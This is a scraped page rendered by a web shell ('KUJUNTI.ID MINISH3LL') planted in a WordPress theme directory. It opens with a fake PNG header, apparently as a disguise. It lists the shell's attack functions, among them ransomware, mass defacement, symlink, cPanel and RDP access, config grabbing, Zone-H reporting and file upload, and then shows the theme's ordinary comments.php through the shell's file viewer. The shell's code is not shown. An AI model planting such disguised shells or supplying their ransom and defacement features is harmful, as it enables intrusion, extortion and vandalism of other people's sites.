\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/ob-new/wp-content/themes/honeypress/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/ob-new/wp-content/themes/honeypress/comments.php


<?php
/**
 * The template for displaying comments
 *
 * This is the template that displays the area of the page that contains both the current comments
 * and the comment form.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Honeypress
 */

/*
 * If the current post is protected by a password and
 * the visitor has not yet entered the password we will
 * return early without loading the comments.
 */
if ( post_password_required() ) {
	return;
}
if ( have_comments() ) :?>
	<article class="comment-section">
		<div class="comment-title">
			<h3>
				<?php
				$honeypress_comment_count = get_comments_number();
				if ( '1' === $honeypress_comment_count ) {
					printf(
					/* translators: 1: title. */
					esc_html__( '1 COMMENT', 'honeypress' ),
					'<span>' . esc_html(get_the_title()) . '</span>'
					);
				} else {
					printf(
					/* translators: 1: comment count number, 2: title. */
					esc_html( _nx( '%1$s COMMENT', '%1$s COMMENTS', $honeypress_comment_count, 'comments title', 'honeypress' ) ),
					esc_html( number_format_i18n( $honeypress_comment_count )),
					'<span>' . esc_html(get_the_title()) . '</span>'
					);
				}
				?>
			</h3>
		</div>
		<?php the_comments_navigation();
		wp_list_comments( 'type=comment&callback=honeypress_comment');
		the_comments_navigation();

		// If comments are closed and there are comments, let's leave a little note, shall we?
		if ( ! comments_open() ) :?>
			<p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'honeypress' ); ?></p>
		<?php endif; 
		echo '</article>';
		endif; 
		echo '<article class="comment-form">';
		comment_form();
		echo '</article>';?>

© KUJUNTI.ID